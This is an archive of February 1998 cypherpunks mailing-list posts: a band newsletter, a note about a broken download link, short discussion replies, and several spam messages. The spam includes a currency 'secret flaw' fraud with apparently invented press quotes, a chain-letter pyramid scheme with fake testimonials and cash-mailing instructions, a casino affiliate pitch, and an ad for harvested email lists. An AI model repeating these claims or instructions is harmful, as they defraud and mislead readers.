From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bove@rockument.com (Tony Bove)
Date: Sun, 22 Feb 1998 13:51:10 -0800 (PST)
To: fobb-followers@toad.com
Subject: Update
Message-ID: <v02140b01b1123fa3766b@[204.189.13.45]>
MIME-Version: 1.0
Content-Type: text/plain


Hello all you FOBBheads,

The Flying Other Brothers Band is enjoying itself! Featuring Roger McNamee,
Giles McNamee, Bill Bennett, Tony Bove, Bert Keely, and Larry Marcus, with
guest percussionist Corrine.


NEWS
------
* Tony just had an amazing El Nino experience and is now with vehicle
courtesy of Hertz. You can read his story at:

http://www.rockument.com/downflood.html


* Tom Cottingham shows up at Deer Valley, Utah gig for a mini-Random Axes
reunion. Read about that gig below.


UPCOMING EVENTS
--------------------
* March 10, Internet World, L.A. -- at Billboard Live, 7pm-10pm. Fleischman
Hillard party, featuring FOBBs and a band from Excite. Details to come.

* March 30, DMG private party, Hotel Sofitel, Redwood City, CA --
tentative. Details to come.

* July 4, Gualalapalooza, Gualala, CA -- tentative. Details to come.

* Sometime in July, Amazon.com Picnic, Seattle, WA -- tentative. Details to
come.


THE LAST GIG
---------------

We recently returned from an elite financial retreat, Morgan Stanley's Ski
Weekend in Deer Valley, Utah (I know, life is tough), where we played two
sets for a crowd of CEOs and CFOs, and we had them dancing on the tables!

Highlights from that show:

Back in the U.S.S.R. (Beatles)
Secret Agent Man (Johnny Rivers)
-- Roger leads these openers, both howlers, got them on their feet with a
not-so-subtle political message.

Brown-Eyed Girl (Van Morrison)
-- Giles sings that souful lead, but this time with the two conference
organizers singing backup!

City of New Orleans (Arlo Guthrie)
-- with guest vocalist Tom Cottingham, an original member of Random Axes

Deal (Grateful Dead)
-- perfect for those investment bankers in the audience.

One Toke Over the Line (Brewer & Shipley)
-- ... and for once, Tony's home town was not introduced as the capital of
Calif. largest cash crop.

Dead Flowers (Rolling Stones)
-- another good one for investment bankers, this time with Morgan Stanley's
chief organizer Rex playing drums.

Layla (Eric Clapton)
-- Just about our finest version, merging the laid-back style that won Eric
so many awards with the high-octane guitar solo that made this song so
interesting, plus the Duane Allman slide second part sans piano.

Paint It, Black (Rolling Stones)
-- Whoa! What a tambourine ride, Corrine! Giles screams this one while Tony
gives us his Morroccan interpretation.

Like a Rolling Stone (Bob Dylan)
-- You can't beat this message. How many of these financial types actually
feel like they have no home, no direction known? Complete unknown?

Ticket to Ride (Beatles)
-- Bert gets this guitar part exactly perfect, while Roger and Tony play
John and Paul.

Jack Straw (Grateful Dead)
-- We can share the women, we can share the wine. Now that's something
those financial types can understand... This was incandescent. Larry was
once again brilliant.

The Night They Drove Old Dixie Down (The Band)
-- Our "Gone With the Wind" interpretation, led by Roger.

Six Days on the Road (Flying Burrito Brothers and others)
-- Thanks Giles, for your life story. Way to play, Tony and others...

White Room (Cream)
-- Tony sings, and Bert just wails on lead guitar!

Last Time (Rolling Stones) -> Goin' Down the Road Feelin' Bad (Grateful
Dead and others)
-- Goin' where the climate suits my clothes... Dr. Bill, he of the big
bottom sound, rocked the house.

White Shoe Shuffle (Flying Other Brothers Band)
-- Our own truly original number, written by Dr. Bill Bennett, had them
rolling the aisles (laughing) as Tony sang lead.

Uncle John's Band (Grateful Dead)
-- We had the audience singing along on this one, in 4-part harmony. Once
again, Larry knows where the time goes.

Abbey Road Side 2 (Beatles)
-- Bert's "Here Comes the Sun" into Roger's "Mean Mr. Mustard" and on
through the rest of the songs into "The End" which absolutely captivated
this crowd.


Encores (yes they hollered for more):

Iko Iko (Neville Brothers, Grateful Dead, lots of others)
-- We brought back Rex for drums, and introduced Roger Lynch on guitar, who
was already too good for us!

Johnny B. Goode (Chuck Berry and everyone else)
-- We just had to do it. Thanks everyone, and good night!


- - - - - - - - - -
They've been going in and out of style
But they're guaranteed to raise a smile.
--Beatles, "Sgt. Pepper's Lonely Hearts Club Band" (Lennon/McCartney)
- - - - - - - - - -
Tony Bove
bove@rockument.com
http://www.rockument.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@REPLAY.COM>
Date: Sun, 22 Feb 1998 05:02:35 -0800 (PST)
To: cypherpunks@ssz.com
Subject: Re: DLing from Replay.com
Message-ID: <199802221302.OAA27880@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <a7a15ef0e0850cd6298e5b6f0dd20958@squirrel.owl.de> you wrote:

: |Forbidden

: |You don't have permission to access /security/browsers/128bit/CommunicatorUS-v401-Pro/windows/cp16d401.exe on this
: |server.

: |There was also some additional information available about the error:
: |[Mon Feb 16 21:13:24 1998] access to
: |/pub/WWW/www.replay.com/security/browsers/128bit/CommunicatorUS-v401-Pro/windows/cp16d401.exe
: |failed for xxxxxx.xxxxx.xxxxx.xxx, reason: file permissions deny server execution 

My fault: the extension .exe is used for cgi-scripts @replay, so the
webinterface thinks that the file is a cgi script, and not a downloadable
archive so it tries to execute it which ofcourse doesnt work.

try the following URL:

ftp://ftp.replay.com/pub/crypto/browsers/128bit/

Sorry for the mess ..
--
  Alex de Joode | adejoode@REPLAY.COM | http://www.replay.com
	Replay Associates: Your Internet Problem Provider.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kelly1@primenet.com
Date: Sun, 22 Feb 1998 14:08:09 -0800 (PST)
To: Kelly1@primenet.com
Subject: Hi, how are you !
Message-ID: <199802222208.OAA16738@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Friend:

This is an extremely IMPORTANT announcement for you!

iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
               IMPORTANT ANNOUNCEMENT
               IMPORTANT ANNOUNCEMENT
               ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
               Your Future May Depend on it!!!
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii

Before you learn about this 'Important Announcement', please read the
following 'Editorial Excerpts' first from some important publications in the
United States:

New York Times:     "In concluding our review of Financial Organizations
'''''''''''''''''''''''''''''''''''''''''''''''      to effect change in the 90's, special attention should
be called to 'World Currency Cartel' organization based in California.  The
members of this organization are amassing hundreds of millions of dollars
in the currency market using a very LEGAL method which has NEVER
been divulged to the general public. While their purpose is not yet known,
their presence has most certainly been felt".

NBC  Nightly News:    " Members of the World Currency Cartel organization,
''''''''''''''''''''''''''''''''''''''''''''''''''''''    who always keep very Low Profile of themselves ,
are some of the most powerful and wealthiest people in this hemisphere".

More Excerpts later, but first let us give you this "Important Announcement":
```````````````````````````````````````````````````````````````````````````````````````````````````````````
We are glad to announce that for the very first time, the World Currency
Cartel organization will instruct a LIMITED number of people Worldwide
HOW TO CONVERT $25 INTO ONE HUNDRED OF LEGAL CURRENCY.
We will transact the first conversion for you, after that you can quickly and
easily do this on your own hundreds or even thousands of times each and
every month.

TAKE ADVANTAGE OF THIS "SECRET FLAW" !
===================================

It is even more explosive than we have yet disclosed. While currency
does fluctuates daily, we can show you  HOW TO CONVERT $99 
INTO $580 as many times as you want. That means, you will be able
to CONVERT $99 AMERICAN LEGAL CURRENCY DOLLARS FOR 
$580 OF THE SAME. You can do this as many times as you wish, 
every day, every week, every month. All very LEGALLY and effort-
lessly!

It only takes about 5 to 10 minutes each time you do this. You can do
this from your home, office or even while travelling. All you need is an
access to a phone line and an address. Best of all, you can do this
from ANY CITY ON THIS EARTH!!!

Again, we must reiterate, anyone can do this and the source is NEVER-
ENDING. For as long as the global financial community continues to
use different currencies with varying exchange rate, this "Secret Flaw"
will exist.                                                                    '''''''''''''''''''''''''''''''''''''''''''

As we said earlier, we will do the first transaction for you and will also
show you exactly how to do this on your own, over and over again.

The amount of exchange you would do each time is entirely up to you.
Working just 2 to 10 hrs a week, you can soon join the list of Mllionaires
who do this on a daily basis and many times a day. The transaction is
so simple that even a high school kid can do it!

We at the World Currency Cartel organization would like to see a uniform
global  currency backed by gold. But, until then, we will allow a LIMITED
number of individuals worldwide to share in the Unlimited Profits provided
for by the world currency differentials.

We will espouse no more political views nor will we ask you do so. We
can say however, that our parent organization Wealth Exchange Int. 
benefits greatly by the knowledge being shared as we ourselves along
with you benefit likewise. Your main concern surely will be, how you will
benefit.

In a short time, after you become a member, you can start making trans-
actions from your home, office, by telephone or through the mail and even
while travelling. As we said earlier, we will do the first transaction for you
and will show you exactly how to do this over and over again.

No one can stop you from earning hundreds of thousands and even
millions of dollars each year for as long as this "SECRET FLAW" exist!
                                                                       ''''''''''''''''''''''''''''''''''''''''''''''
Don't believe us, experience it for ourself !
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;     Unlike anyone else, we
will assure you a great financial freedom and you will add to our quickly
growing base of supporters and join the list of Mllionaires being created
using this " Secret Flaw " in the world currency market!!

DON'T ENVY US, JOIN US TODAY !!!
*******************************************
There is a one time membership fee of only $195.00. BUT, if you join
us by March 15, 1998, which is our company's second Anniversarry
date, you can join us for only $25 administrative cost. Your important
documents, instructions, contact name/address/phone number and
all other pertinent information will be mailed to you immediately. So ,
take advantage of our Anniversarry date and join us today.

(If you are replying AFTER March 15, 1998; you must pay $195  for
the membership. NO EXCEPTIONS and no more e-mail enquiries).

Upon becoming a member, you promise to keep all infos CONFIDENTIAL.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Should you choose to cancel your membership for any reason, you must
return all documents for a refund within 60 days.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

IMPORTANT:
''''''''''''''''''''''''''''''''''''''
1.....Write your name & mailing address VERY CLEARLY on paper
2.....Below your address, please write your E-mail address (Optional)
3.....At the top Left hand corner, write the word "NEW MEMBER"
4.....Attache a CHECK or M.O. for $25 plus $3 for postage & shipping
        (Total  US$ 28.00)
5.....Make it payable to 'WEALTH EXCHANGE INT.' and mail to:

                   WEALTH EXCHANGE INT.
                   9903 SANTA MONICA BL;
                   SUITE #  405
                   BEVERLY HILLS,
                   CA 90212.
                   U.S.A.

( Overseas request MUST ADD US$ 10.00 EXTRA for the postage ).
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Here are some more Editorial Excerpts:
````````````````````````````````````````````````````````
Wall Street:     " A discreet group of Americans, operating under the
                        guise of World Currency Cartel have recently begun
making rumbles in world finance market. While at this time, their game
is not completely known, they certainly be watched by those making
major moves in the curency contracts".

Financial Week:    " Watch them, monitor them, extract their knowledge
                               and try to become one of them. That is the soundest
financial advice we could give someone".

National Business Weekly :   " While this reporter has been left in the cold
                                               as to its method of operation, we have been
able to confirm that World Currency Cartel and its members are literally
amassing great fortunes overnight".

$$$$$$$$$$$$$$$$$$$$$$$$$$$ END $$$$$$$$$$$$$$$$$$$$$$$$$$$$







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: partners@worldgaming.net (Tracy Kurz)
Date: Sun, 22 Feb 1998 17:27:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Online Casino Partners wanted...
Message-ID: <19980223010310.CQN18236@worldgaming.net>
MIME-Version: 1.0
Content-Type: text/plain


Over the next three years, the Internet gaming market is expected to
generate revenues of anywhere from US$10 billion to US$20 billion, says PC
Computing. A leader in recognizing new and emerging markets, World Gaming
is pleased to become a significant resource for enabling webmasters to
participate in this exciting opportunity. 

World Gaming (www.worldgaming.net) is an innovative on-line gaming
operation offering casino-style games, a Sportsbook with real-time betting
lines, an international lottery ticket brokerage, and live video/audio
Internet broadcasting of horse-racing from around the world. World Gaming
is a wholly owned subsidiary of Starnet Communications International Inc.
(www.starnetcommunications.com), a publicly traded company and developer
and broadcaster of revenue-producing content for the Internet since 1995. 

Licensed in Antigua to accept, process, and manage real money wagers via
the Internet, World Gaming has now introduced the Partners Program, aimed
at web site operators wanting to generate more revenue and offer customers
greater entertainment value from their site. You can become a World Gaming
Partner, earning commissions, at no expense and no risk to you or your web
site. 

To collect generous revenues, all you have to do is strategically place one
of the attractive World Gaming banners on your web site. If you prefer, you
can devote an entire page to World Gaming - it's up to you. As customers
click through, you will share in the "house" profits every time one of your
customers places a wager. The more members you refer, the more commissions
you receive! 

To sign up, please go to the World Gaming Partners Program web site at:
http://www.worldgaming.net/partners 

Value is guaranteed. World Gaming is a state-of-the-art international
gaming web site and CD-ROM software package. World Gaming offers:
o Outstanding casino graphics and 3-D animations in a variety of casino
environments, including a unique "Adult-theme" casino
o A wide variety of internationally appealing casino-style games
o Complete Sportsbook with direct betting lines from Las Vegas and Europe
o Lottery brokerage featuring lotteries from all over the world
o Pari-mutuel wagering on live horse races from international race tracks
o Top-notch, reliable technical support 24 hours a day, seven days a week
o Guaranteed security of all Internet financial transactions
o Translation into 8 international languages

Because we do not accept wagers from the U.S. or Canada, World Gaming does
not believe that its business actions violate any existing regulations in
those areas. World Gaming will focus on the market outside of North America
until such time as U.S. and Canadian laws regarding Internet gaming are
clarified. It is estimated that as much as 80% of the world gambling market
is from regions outside of North America, specifically in Asia and Europe.

Details:
o You will earn 25% of the revenues earned from the customers you turn onto
World Gaming.
o Each Partner is given a unique identifying code that enables World Gaming
to ensure you receive your commissions every time one of your customers
logs in to play.
o There is absolutely no investment on your behalf.
o There is absolutely no risk on your behalf.
o You accept no liability whatsoever for the legal ramifications of
Internet gambling.

Join the World Gaming Partners Program today!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AMF Investments <amf/h/o@nowhere.com>
Date: Sun, 22 Feb 1998 17:45:39 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: HOTTEST MONEY MAKING OPPORTUNITY ON THE INTERNET!!
Message-ID: <18161.235848.82837616 cypherpunks@toad.com	>
MIME-Version: 1.0
Content-Type: text/plain


BEFORE YOU HASTILY DELETE THIS MAILING, PLEASE PRINT IT OUT. 
(NEED TO REPLY IF YOU WANT TO BE REMOVED FROM MY MAILING LIST, 
FAILURE TO RESPOND WILL AUTOMATICALLY REMOVE YOU FROM THE 
LIST)

THIS IS THE HOTTEST OPPORTUNITY ON THE INTERNET AND ONE THAT 
WILL CHANGE YOUR LIFE (STYLE) FOREVER!

IF YOU THINK "NOT FOR ME", THEN WHAT ABOUT FOR YOUR FAMILY!

How Many Things Did You And Your Family Go Without This Past Year,
Simply Because You Couldn't Afford Them? Isn't it about time you and
your family got the things you always wanted? Aren't you tired of always
having to tell your family: "Maybe next year we can get that new car, we
just can't afford to take that kind of vacation," "I'm sorry, all I can afford
for you, is junior college," or "look, my boss said he'd try to give me that
raise in 6 months"

THIS PROGRAM IS PROVEN OVER AND OVER, TIME AND TIME AGAIN!

THERE ARE THOUSANDS OF THOSE WHO HAVE SEEN IT WORK AND 
CONTINUE TO USE IT BECAUSE IT DOES WORK!!!


Hello!

My name is Matthew Forti; I'm a 45-year-old father, and husband. As a rule, I delete 
all unsolicited "junk" e-mail and use my account primarily for business.  I received 
what I assumed was this same e-mail countless times and deleted it each time.

About two months ago I received it again and, because of the catchy subject line,  I 
finally read it.  Afterwards, I thought , "OK, I give in, I'm going to try this.  I can certainly 
afford to invest $20 and, on the other hand, there's nothing wrong with creating a little 
excess cash."  I promptly mailed four $5 bills and, after receiving the reports, paid a 
friend of mine a small fee to send out some e-mail advertisements for me.  After 
reading the reports, I also learned how easy it is to bulk e-mail for free! 

I was not prepared for the results.  Everyday for the last six weeks, my  P.O. box has 
been overflowing with $5 bills; many days the excess fills up an extra mail bin and 
I've had to upgrade to the corporate-size box!  I am stunned by all the cash  that 
keeps rolling in!

I promise you, if you follow the directions in this e-mail and be prepared to 
eventually set aside about an hour each day to follow up (and count your money!), 
you will make at least as much money as we did.  You don't need to be a wiz at the 
computer, but I'll bet you already are.   If you can open an envelope, remove the 
money, and send an e-mail message, then you're on your way to the bank.  Take 
the time to read this so you'll understand how easy it is. Believe me, it works!

                                                       GO FOR IT NOW!
Sincerely,

Matthew Forti

The following is a copy of the e-mail I read:

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

This is a LEGAL, LOW-COST, MONEY-MAKING PHENOMENON.

PRINT this letter, read the directions, THEN GET STARTED TODAY!

You are about to embark on the most profitable and unique program you may ever 
see.  Many times over, it has demonstrated and proven its ability to generate large 
amounts of cash.  This program is showing fantastic appeal with a huge and ever-
growing on-line population desirous of additional income.

This is a legitimate, LEGAL, money-making opportunity.  It does not require you to 
come in contact with people, do any hard work, and best of all, you never have to 
leave the house, except to get the mail and go to the bank!

This truly is that lucky break you've been waiting for!  Simply follow the easy 
instructions in this letter, and your financial dreams will come true! When followed 
correctly, this electronic, multi-level marketing program works perfectly... 100% OF 
THE TIME!

Thousands of people have used this program to:

    -  Raise capital to start their own business
    -  Pay off debts
    -  Buy homes, cars, etc.,
    -  Even retire!

This is your chance, so read on and get started today!

----------------------------------------------------------------------------------
OVERVIEW OF THIS EXTRAORDINARY 
ELECTRONIC MULTI-LEVEL MARKETING PROGRAM
----------------------------------------------------------------------------------

Basically, this is what we do:

We send thousands of people a product for $5.00 that costs next to nothing to 
produce and e-mail. As with all multi-level businesses, we build our business by 
recruiting new partners and selling our products.  Every state in the U.S. allows you 
to recruit new multi- level business online (via your computer).

The products in this program are a series of four business and financial reports 
costing $5.00 each.  Each order you receive via "snail mail" will include:

  * $5.00 cash
  * The name and number of the report they are ordering
  * The e-mail address where you will e-mail them the report they
     ordered.

To fill each order, you simply e-mail the product to the buyer.  THAT'S IT!  The 
$5.00 is yours!  This is the EASIEST electronic multi-level marketing business 
anywhere! 

FOLLOW THE INSTRUCTIONS TO THE LETTER AND
BE PREPARED TO REAP THE STAGGERING BENEFITS!

******* I  N  S  T  R  U  C  T  I  O  N  S *******

This is what you MUST do:

1. Order all 4 reports shown on the list below (you can't sell them if you don't order 
them).
     
     *  For each report, send $5.00 CASH, the NAME & NUMBER OF THE
        REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and 	YOUR 
NAME & RETURN ADDRESS (in case of a problem) to the 	person  whose 
name appears on the list next to the report. MAKE 	SURE YOUR RETURN 
ADDRESS IS ON YOUR ENVELOPE IN 	CASE OF ANY MAIL 
PROBLEMS!
  
     *  When you place your order, make sure you order each of the
        four reports.  You will need all four reports so that you can save
        them on your computer and resell them.

     *  Within a few days you will receive, via e-mail, each of the four
        reports. Save them on your computer so they will be accessible
        for you to send to the 1,000's of people who will order them
        from you.

2.  IMPORTANT-- DO NOT alter the names of the people who are listed
     next to each report, or their sequence on the list, in any way other
     than is instructed below in steps "a" through "f" or you will lose
     out on the majority of your profits.  Once you  understand the way
     this works, you'll also see how it doesn't work if you change it.
     Remember, this method has been tested, and if you alter it, it will
     not work. ( I talked to a friend last month who has also done this
     program.  He said he had tried "playing" with it to change the
     results.  Bad idea.... he never got as much money as he did with
     the un-altered version.  Remember, it's a proven method!

    a.  Look below for the listing of available reports.

    b.  After you've ordered the four reports, take this advertisement and 
         remove the name and address under REPORT #4. This person has 
         made it through the cycle and is no doubt counting their 50 grand!

    c.  Move the name and address under REPORT #3 down to  REPORT #4.  

    d.  Move the name and address under REPORT #2 down to REPORT #3.

    e.  Move the name and address under REPORT #1 down to REPORT #2.

    f.  Insert your name/address in the REPORT #1 position.

Please make sure you copy every name and address ACCURATELY!

3.  Take this entire letter, including the modified list of names, and
     save it to your computer.  Make NO changes to the instruction
     portion of this letter.
  
4.  Now you're ready to start an advertising campaign on the
     INTERNET!  Advertising on the 'Net is very, very inexpensive,
     and there are HUNDREDS of FREE places to advertise. Another
     avenue which you could use for advertising is e-mail lists.  
     You can buy these lists for under $20/2,000 addresses or you
     can pay someone a minimal charge to take care of it for you. 
     BE SURE TO START YOUR AD CAMPAIGN IMMEDIATELY!

5.  For every $5.00 you receive, all you must do is e-mail them the
     report they ordered.  THAT'S IT!  ALWAYS PROVIDE SAME-DAY
     SERVICE ON ALL ORDERS!  This will guarantee that the e-mail THEY
     send out, with YOUR name and address on it, will be prompt
     because they can't advertise until they receive the report!

------------------------------------------
AVAILABLE REPORTS
------------------------------------------

*** Order Each REPORT by NUMBER and NAME ***

Notes:

-  ALWAYS SEND $5 CASH (U.S. CURRENCY) FOR EACH REPORT
   CHECKS NOT ACCEPTED
-  ALWAYS SEND YOUR ORDER VIA FIRST CLASS  MAIL 
-  Make sure the cash is concealed by wrapping it in at least two
   sheets of paper  
-  On one of those sheets of paper, include: (a) the number & name
   of the report you are ordering, (b) your e-mail address, and
   (c) your name & postal address.

PLACE YOUR ORDER FOR THESE REPORTS NOW:
______________________________________________________________

REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" 

      ORDER REPORT #1 FROM:  
           
	 AMF Investments
          2319 South Kirkwood   #144
           Houston,  TX  77077

______________________________________________________________

REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

      ORDER REPORT #2 FROM:

	  Fusion Marketing Ltd.
            8895 Towne Centre Drive
            Suite 105-303A
            La Jolla, CA 92122-5542

______________________________________________________________

REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

      ORDER REPORT #3 FROM:
		LockMan
            P.O. Box 927603
            San Diego, CA  92192-0603


______________________________________________________________

REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"

      ORDER REPORT #4 FROM:
		KEY
            P.O. Box 270227
            San Diego, CA 92198

______________________________________________________________

----------------------------------------------------------------------------------------------
HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$
------------------------------------------------------------------------------------------------

Let's say you decide to start small just to see how well it works. Assume your goal 
is to get 10 people to participate on your first level. (Placing a lot of FREE ads on 
the internet will EASILY get a larger response.) Also assume that everyone else in 
YOUR ORGANIZATION gets ONLY 10 downline members.  Follow this example to 
achieve the STAGGERING results below.

1st level--your 10 members with $5............................................$50
2nd level--10 members from those 10 ($5 x 100).....................$500
3rd level--10 members from those 100 ($5 x 1,000)............$5,000
4th level--10 members from those 1,000 ($5 x 10,000)...$50,000
                      THIS TOTALS        ----------->$55,550

Remember friends, this assumes that the people who participate only recruit 10 
people each.  Think for a moment what would happen if they got 20 people to 
participate!  Most people get 100's of participants! THINK ABOUT IT!

Your cost to participate in this is practically nothing (surely you can afford $20). You 
obviously already have an Internet connection and e-mail is FREE! 

REPORT#3 shows you the most productive methods for bulk e-mailing and 
purchasing e-mail lists.  Some list & bulk e-mail vendors even work on trade!

About 50,000 new people get online every month!

******* TIPS FOR SUCCESS *******

 *  TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and
     follow the directions accurately.

 *  Send for the four reports IMMEDIATELY so you will have them
    when the orders start coming in because:

        When you receive a $5 order, you MUST send out the requested
        product/report to comply with the U.S. Postal & Lottery Laws, Title
        18,Sections 1302 and 1341 or Title 18,  Section 3005 in the U.S. Code,
        also Code of Federal Regs. vol. 16, Sections 255 and 436, which state 
        that "a product or service must be exchanged for money received."

 *  ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

 *  Be patient and persistent with this program. If you follow the 
    instructions exactly, your results WILL be SUCCESSFUL!

 *  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL
    SUCCEED!


******* YOUR SUCCESS GUIDELINES *******

Follow these guidelines to guarantee your success:

If you don't receive 10 to 20 orders for REPORT #1 within two weeks, continue 
advertising until you do.  Then, a couple of weeks later you should receive at least 
100 orders for REPORT #2.  If you don't, continue advertising until you do.

Once you have received 100 or more orders for REPORT #2, YOU CAN RELAX, 
because the system is already working for you, and the cash will continue to roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you are placed in front of a 
DIFFERENT report.  You can KEEP TRACK of your PROGRESS by watching 
which report people are ordering from you.  If you want to generate more income, 
send another batch of e-mails and start the whole process again!  There is no limit 
to the income you will generate from this business!


******* T  E  S  T  I  M  O  N  I  A  L  S *******

     This program does work, but you must follow it EXACTLY!  Especially the rule of 
not trying to place your name in a different position, it won't work and you'll lose a lot 
of potential income.  I'm living proof that it works.  It really is a great opportunity to 
make relatively easy money, with little cost to you.  If you do choose to participate, 
follow the program exactly, and you'll be on your way to financial security. 
          Sean McLaughlin, Jackson, MS

     My name is Frank. My wife, Doris, and I live in Bel-Air, MD. I am a cost accountant 
with a major U.S. Corporation and I make pretty good money. When I received the 
program I grumbled to Doris about receiving "junk mail." I made fun of the whole 
thing, spouting my knowledge of the population and percentages involved.  I 
"knew" it wouldn't work. Doris totally ignored my supposed intelligence and jumped 
in with both feet. I made merciless fun of her, and was ready to lay the old "I told you 
so" on her when the thing didn't work... well, the laugh was on me!  Within two weeks 
she had received over 50 responses. Within 45 days she had received over 
$147,200 in $5 bills! I was shocked!  I was sure that I had it all figured and that it 
wouldn't work.  I AM a believer now. I have joined Doris in her "hobby."   I did have 
seven more years until retirement, but I think of the "rat race" and it's not for me. We 
owe it all to MLM.
           Frank T., Bel-Air, MD

    I just want to pass along my best wishes and encouragement to you.  Any doubts 
you have will vanish when your first orders come in. I even checked with the U.S. 
Post Office to verify that the plan was legal. It definitely is! IT WORKS!!!
           Paul Johnson, Raleigh, NC

    The main reason for this letter is to convince you that this system is honest, lawful, 
extremely profitable, and is a way to get a large amount of money in a short time. I 
was approached several times before I checked this out. I joined just to see what 
one could expect in return for the minimal effort and money required.  To my 
astonishment, I received $36,470.00 in the first 14 weeks, with money still coming in.
           Sincerely yours, Phillip A. Brown, Esq.

    Not being the gambling type, it took me several weeks to make up my mind to 
participate in this plan. But conservative that I am, I decided that the initial 
investment was so little that there was just no way that I wouldn't get enough orders 
to at least get my money back. Boy, was I surprised when I found my medium-size 
post office box crammed with orders!  For awhile, it got so overloaded that I had to 
start picking up my mail at the window. I'll make more money this year than any 10 
years of my life before. The nice thing about this deal is that it doesn't matter where 
in the U.S. the people live. There simply isn't a better investment with a faster return.
         Mary Rockland, Lansing, MI

    I had received this program before. I deleted it, but later I wondered if I shouldn't 
have given it a try. Of course, I had no idea who to contact to get another copy, so I 
had to wait until I was e-mailed another program...11 months passed then it came...I 
didn't delete this one!...I made more than $41,000 on the first try!!
          D. Wilburn, Muncie, IN

     This is my third time to participate in this plan. We have quit our jobs, and will 
soon buy a home on the beach and live off the interest on our money.  The only 
way on earth that this plan will work for you is if you do it. For your sake, and for your 
family's sake don't pass up this golden opportunity.  Good luck and happy 
spending!
           Charles Fairchild, Spokane, WA


ORDER YOUR REPORTS TODAY AND
GET STARTED ON YOUR ROAD TO 
GETTING EXTRA CASH DAILY!

NOW  IS THE TIME FOR YOUR TURN

DECISIVE ACTION YIELDS
POWERFUL RESULTS




























From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Fiero <rfiero@pophost.com>
Date: Sun, 22 Feb 1998 19:49:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: CIA Blasts Bay of Pigs Op
In-Reply-To: <1.5.4.32.19980222175049.006808d4@pop.pipeline.com>
Message-ID: <199802230348.UAA17099@pophost.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young writes:
>
>The NY Times reports today that the National Security Archive 
>has obtained under FOIA the sole remaining copy of the
>CIA's 1962 Top Secret survey of the Bay of Pigs disaster. 
>The highly critical document is termed one of the most secret 
>documents of the cold war. We've put a copy of the article at:
>
>   http://jya.com/cia-pigs.htm
. . .

Central Intelligence is now portraying itself as a bungling and hopelessly
harmless bureaucracy.
Sure.
-- Richard Fiero




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 22 Feb 1998 19:00:31 -0800 (PST)
To: cypherpunks@toad.com (Cypherpunks)
Subject: Privacy books
Message-ID: <199802230259.UAA09876@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Could anyone suggest a book that gives recommendations on improving
privacy? I do not want my name to be in too many databases. There are
very many such books but I am not sure which one is best.

Thank you.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 57324685@aol.com
Date: Sun, 22 Feb 1998 22:09:23 -0800 (PST)
To: 57324685@aol.com
Subject: JUST RELEASED!  16 Million!!!
Message-ID: <011297055501222@g_fantasm.com>
MIME-Version: 1.0
Content-Type: text/plain



IT WAS JUST RELEASED!!
 
INTRODUCING...MILLIONS VOL. 1

We took a total of over 92 million email addresses from many of the
touted CD's that are out there (bought them all - some were $300+)!
We added the millions we had in storage to those.   When we
combined them all, we had in  excess of 100+ million addresses
in one huge file.

We then ran a super "sort/de-dupe" program against this huge list.
It cut the file down to less than 25 million!!! Can you believe that? It
seems that most people that are selling CD's are duping the public
by putting numerous files of addresses in the CD over and over. This
created many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc.
This causes a tremendous amount of undeliverables, and for  those
that use Stealth programs, clogs up servers quickly with trash, etc.

We then ran a program that contained 150+ keywords to remove
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu,
.mil, .org, .gov, etc.   After that list was run against the remaining list,
it  reduced it down to near 16 million addresses!

So, you see, our list will save people hundreds of dollars buying all
others that are out there on  CD and otherwise. Using ours will be like
 using the 100+ million that we started with, but a lot  less money and
alot less time!!

We also purchased Cyber-Promos ($995.00) CD.   We received it just
prior to finishing production work on the new CD.   We had our people
take a random sample of 300,000 addresses  from the touted 2.9 that
they advertised.   We used a program that allows us to take a random
